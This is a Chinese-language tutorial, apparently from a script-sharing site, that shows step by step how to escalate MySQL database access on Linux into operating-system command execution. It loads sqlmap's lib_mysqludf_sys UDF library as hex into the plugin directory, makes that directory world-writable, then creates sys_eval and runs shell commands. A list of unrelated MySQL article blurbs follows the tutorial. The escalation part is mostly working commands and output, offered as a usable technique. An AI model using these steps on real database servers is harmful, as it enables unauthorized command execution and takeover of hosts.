Linux利用UDF库实现Mysql提权
更新时间:2014年07月02日 15:36:09 投稿:hebedich
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
环境:
os:linux(bt5)
database:mysql
简述:
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
要求:
在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;
过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令
1,得到插件库路径
mysql> show variables like "%plugin%"; +---------------+-----------------------+ | Variable_name | Value | +---------------+-----------------------+ | plugin_dir | /usr/lib/mysql/plugin | +---------------+-----------------------+ 1 row in set (0.00 sec)
2,找对应操作系统的udf库文件
因为自己测试,看了下自己系统的版本,64位
root@bt:~# uname -a Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可
root@bt:/pentest/database/sqlmap/udf/mysql# ls linux windows root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls 32 64 root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls lib_mysqludf_sys.so
3,利用udf库文件加载函数并执行命令
首先要得到udf库文件的十六进制格式,可在本地通过
mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)
因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限
root@bt:~# chmod 777 /usr/lib/mysql/plugin
数据库中写入udf库到mysql库目录:
mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)
查看下这个udf库所支持的函数
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
w _Jv_RegisterClasses
0000000000201788 A __bss_start
w __cxa_finalize
w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
U fgets
U fork
U free
U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
U malloc
U mmap
U pclose
U popen
U realloc
U setenv
U strcpy
U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
U sysconf
U system
U waitpid
最后,加载函数并执行:
mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql |
+--------------------+
1 row in set (0.04 sec)
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set
相关文章
Navicat中新建MySQL数据库与新建、修改、删除数据表及删除数据库详细操作方法
Navicat是一套快速、可靠并价格相当便宜的数据库管理工具,专为简化数据库的管理及降低系统管理成本而设,这篇文章主要给大家介绍了关于Navicat中新建MySQL数据库与新建、修改、删除数据表及删除数据库详细操作的相关资料,需要的朋友可以参考下2023-11-11
逗号分割的字符串可以作为分组数据的标识符,用于对数据进行分组和聚合操作,下面这篇文章主要给大家介绍了关于MySql逗号分割的字段数据分解为多行的相关资料,需要的朋友可以参考下2023-12-12
SQL中row_number() over(partition by)的用法说明
这篇文章主要介绍了SQL中row_number() over(partition by)的用法说明,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教2022-07-07
本文主要介绍了Mysql存储json格式的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2023-06-06
MySQL 8.0.35数据库下载安装以及环境变量的配置方法
很多朋友刚开始接触mysql数据库服务器,这篇文章主要给大家介绍了关于MySQL 8.0.35数据库下载安装以及环境变量的配置方法,文中通过图文介绍的非常详细,需要的朋友可以参考下2023-12-12
我是用的最后一种方法,前面三种解决MYSQL导入数据乱码的方法没试过,东莞SEO推荐大家直接使用第四种方法处理MYSQL导入中文数据时的乱码问题。2011-01-01
双机热备从广义上讲,就是对于重要的服务,使用两台服务器,互相备份,共同执行同一服务。这篇文章主要介绍了mysql双机热备实现方案,需要的朋友可以参考下2019-10-10
更改数据库目录是指修改MySQL数据库的存储路径,本文主要介绍了win11系统下mysql8.4更改数据目录问题解决,具有一定的参考价值,感兴趣的可以了解一下2024-07-07
今天教各位小伙伴怎么安装及配置Mysql数据库,文中有非常详细的图文解说及代码示例,对刚入门mysql的小伙伴们很有帮助,需要的朋友可以参考下2021-05-05
这篇文章主要介绍了MySQL中的隐式转换的相关资料,帮助大家更好的理解和使用MySQL数据库,感兴趣的朋友可以了解下2020-10-10
最新评论